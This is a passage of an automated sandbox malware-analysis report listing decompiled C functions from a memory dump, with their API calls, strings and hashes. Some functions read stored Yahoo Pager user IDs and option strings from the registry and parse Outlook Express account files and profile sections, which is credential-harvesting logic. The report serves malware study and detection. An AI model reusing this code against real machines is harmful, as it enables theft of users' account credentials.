                                                                                                                                                                  • API String ID: 3335197805-3671122194
                                                                                                                                                                  • Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                                                                                                                                                                  • Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
                                                                                                                                                                  • Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
                                                                                                                                                                  • Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403278, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403278(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E00402197( &_v1968);
					if(E00403127(_t52, _t49, 0) != 0) {
						E004023C6(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E00402197( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E00403127(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E004023C6(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                                                                                                                  0x00403278
                                                                                                                                                                  0x00403286
                                                                                                                                                                  0x00403290
                                                                                                                                                                  0x00403297
                                                                                                                                                                  0x0040329d
                                                                                                                                                                  0x004032ad
                                                                                                                                                                  0x004032b4
                                                                                                                                                                  0x004032b4
                                                                                                                                                                  0x004032c6
                                                                                                                                                                  0x004032cc
                                                                                                                                                                  0x004032e6
                                                                                                                                                                  0x004032ee
                                                                                                                                                                  0x0040336a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004032f0
                                                                                                                                                                  0x004032f0
                                                                                                                                                                  0x004032f3
                                                                                                                                                                  0x004032f6
                                                                                                                                                                  0x004032f9
                                                                                                                                                                  0x004032fc
                                                                                                                                                                  0x004032fe
                                                                                                                                                                  0x0040335c
                                                                                                                                                                  0x0040335d
                                                                                                                                                                  0x00403364
                                                                                                                                                                  0x00403368
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403306
                                                                                                                                                                  0x0040330c
                                                                                                                                                                  0x00403324
                                                                                                                                                                  0x00403341
                                                                                                                                                                  0x00403341
                                                                                                                                                                  0x00403346
                                                                                                                                                                  0x00403349
                                                                                                                                                                  0x00403353
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403355
                                                                                                                                                                  0x00403353
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040335c
                                                                                                                                                                  0x004032ee
                                                                                                                                                                  0x0040336e

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
                                                                                                                                                                  • memset.MSVCRT ref: 004032CC
                                                                                                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 004032E6
                                                                                                                                                                  • strchr.MSVCRT ref: 0040331B
                                                                                                                                                                    • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
                                                                                                                                                                  • strlen.MSVCRT ref: 0040335D
                                                                                                                                                                    • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                  • String ID: Personalities
                                                                                                                                                                  • API String ID: 2103853322-4287407858
                                                                                                                                                                  • Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                                                                                                                                                                  • Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
                                                                                                                                                                  • Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411622, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00411622(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040F1B0(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040F1F1(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040F1F1(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E0041194A(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                                                                                                                                  0x00411622
                                                                                                                                                                  0x00411633
                                                                                                                                                                  0x0041163d
                                                                                                                                                                  0x00411644
                                                                                                                                                                  0x00411661
                                                                                                                                                                  0x0041167a
                                                                                                                                                                  0x004116ab
                                                                                                                                                                  0x004116ab
                                                                                                                                                                  0x004116b0
                                                                                                                                                                  0x004116b0
                                                                                                                                                                  0x004116bb

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411644
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                  • API String ID: 1830152886-1703613266
                                                                                                                                                                  • Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                                                                                                                                                                  • Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405F4B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405F4B(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E50(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                                                                                                                                  0x00405f55
                                                                                                                                                                  0x00405f59
                                                                                                                                                                  0x00405f61
                                                                                                                                                                  0x00405f61
                                                                                                                                                                  0x00405f6a
                                                                                                                                                                  0x00405f83
                                                                                                                                                                  0x00405fa4

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                  • API String ID: 1670431679-1552265934
                                                                                                                                                                  • Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                                                                                                                                                                  • Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
                                                                                                                                                                  • Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                                                                                                                                                                  • Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F6A8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E0040F6A8(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                                                                                                  0x0040f6af
                                                                                                                                                                  0x0040f6b7
                                                                                                                                                                  0x0040f6bf
                                                                                                                                                                  0x0040f6c7
                                                                                                                                                                  0x0040f6d4
                                                                                                                                                                  0x0040f6d4
                                                                                                                                                                  0x0040f6d7
                                                                                                                                                                  0x0040f6e1

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,73FB48C0,00405C4B,00000000), ref: 0040F6B1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                  • API String ID: 145871493-1506664499
                                                                                                                                                                  • Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                                                                                                                                                                  • Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
                                                                                                                                                                  • Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409808, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00409808(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405F07(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F70E( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E0040918B(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405F07(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405F07(_a4, "</item>\r\n");
			}








                                                                                                                                                                  0x0040981a
                                                                                                                                                                  0x0040981f
                                                                                                                                                                  0x00409826
                                                                                                                                                                  0x00409829
                                                                                                                                                                  0x00409837
                                                                                                                                                                  0x0040983e
                                                                                                                                                                  0x0040985a
                                                                                                                                                                  0x00409869
                                                                                                                                                                  0x0040986f
                                                                                                                                                                  0x00409883
                                                                                                                                                                  0x0040988e
                                                                                                                                                                  0x00409893
                                                                                                                                                                  0x00409896
                                                                                                                                                                  0x00409897
                                                                                                                                                                  0x0040989c
                                                                                                                                                                  0x004098ae

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  • memset.MSVCRT ref: 0040983E
                                                                                                                                                                    • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
                                                                                                                                                                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                  • sprintf.MSVCRT ref: 00409883
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                  • API String ID: 3200591283-2769808009
                                                                                                                                                                  • Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                  • Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
                                                                                                                                                                  • Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411270, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                  			E00411270(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ED5(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L00412090();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E00406725(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00411133(_t25, _t37, _a4, _t28);
						_push(_t28);
						L00412096();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                                                                                                                                  0x00411276
                                                                                                                                                                  0x0041127f
                                                                                                                                                                  0x00411282
                                                                                                                                                                  0x00411290
                                                                                                                                                                  0x00411292
                                                                                                                                                                  0x00411295
                                                                                                                                                                  0x00411297
                                                                                                                                                                  0x00411297
                                                                                                                                                                  0x0041129c
                                                                                                                                                                  0x004112a1
                                                                                                                                                                  0x004112a9
                                                                                                                                                                  0x004112ab
                                                                                                                                                                  0x004112b1
                                                                                                                                                                  0x004112b9
                                                                                                                                                                  0x004112c1
                                                                                                                                                                  0x004112c8
                                                                                                                                                                  0x004112cb
                                                                                                                                                                  0x004112ce
                                                                                                                                                                  0x004112d0
                                                                                                                                                                  0x004112d5
                                                                                                                                                                  0x004112d6
                                                                                                                                                                  0x004112dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004112e7
                                                                                                                                                                  0x004112e9

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041129C
                                                                                                                                                                  • SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
                                                                                                                                                                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                                                                                                                                                                    • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
                                                                                                                                                                    • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                                                                                                                                                                    • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                                                                                                                                                                    • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
                                                                                                                                                                    • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
                                                                                                                                                                    • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004112D6
                                                                                                                                                                  • CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1886237854-0
                                                                                                                                                                  • Opcode ID: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
                                                                                                                                                                  • Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
                                                                                                                                                                  • Opcode Fuzzy Hash: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
                                                                                                                                                                  • Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D63, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00407D63(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E0040658F(_t30);
				}
				return 1;
			}









                                                                                                                                                                  0x00407d6e
                                                                                                                                                                  0x00407d71
                                                                                                                                                                  0x00407d7b
                                                                                                                                                                  0x00407d82
                                                                                                                                                                  0x00407d8d
                                                                                                                                                                  0x00407d9d
                                                                                                                                                                  0x00407dab
                                                                                                                                                                  0x00407db3
                                                                                                                                                                  0x00407db9
                                                                                                                                                                  0x00407dbf
                                                                                                                                                                  0x00407dc4
                                                                                                                                                                  0x00407dc7
                                                                                                                                                                  0x00407dcc
                                                                                                                                                                  0x00407dd2

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 00407D75
                                                                                                                                                                  • GetWindowRect.USER32 ref: 00407D82
                                                                                                                                                                  • GetClientRect.USER32 ref: 00407D8D
                                                                                                                                                                  • MapWindowPoints.USER32 ref: 00407D9D
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                  • Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                                                                                                                                                                  • Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
                                                                                                                                                                  • Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                                                                                                                                                                  • Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004099DA, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004099DA(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405F07(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E0040918B(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405F07(_a4,  &_v516);
			}











                                                                                                                                                                  0x004099f4
                                                                                                                                                                  0x004099f6
                                                                                                                                                                  0x004099fd
                                                                                                                                                                  0x00409a0c
                                                                                                                                                                  0x00409a13
                                                                                                                                                                  0x00409a20
                                                                                                                                                                  0x00409a2c
                                                                                                                                                                  0x00409a30
                                                                                                                                                                  0x00409a36
                                                                                                                                                                  0x00409a4a
                                                                                                                                                                  0x00409a64

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004099FD
                                                                                                                                                                  • memset.MSVCRT ref: 00409A13
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                  • sprintf.MSVCRT ref: 00409A4A
                                                                                                                                                                  Strings
                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
                                                                                                                                                                  • <%s>, xrefs: 00409A44
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                  • API String ID: 3202206310-1998499579
                                                                                                                                                                  • Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                  • Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                  • Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A632, Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A632(void* __eax) {
				void* __esi;
				void* _t36;

				_t36 = __eax;
				SendMessageA( *( *((intOrPtr*)(__eax + 0x370)) + 0x184), 0xb, 0, 0);
				E00405E36();
				 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)) + 0x28)) = 0;
				SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0x1009, 0, 0);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x5c))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x74))(1);
				E0040A5A1(_t36);
				SetCursor( *0x417b98);
				SetFocus( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184));
				return SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0xb, 1, 0);
			}





                                                                                                                                                                  0x0040a63f
                                                                                                                                                                  0x0040a64f
                                                                                                                                                                  0x0040a651
                                                                                                                                                                  0x0040a65e
                                                                                                                                                                  0x0040a672
                                                                                                                                                                  0x0040a67c
                                                                                                                                                                  0x0040a689
                                                                                                                                                                  0x0040a68c
                                                                                                                                                                  0x0040a697
                                                                                                                                                                  0x0040a6a9
                                                                                                                                                                  0x0040a6c5

                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A64F
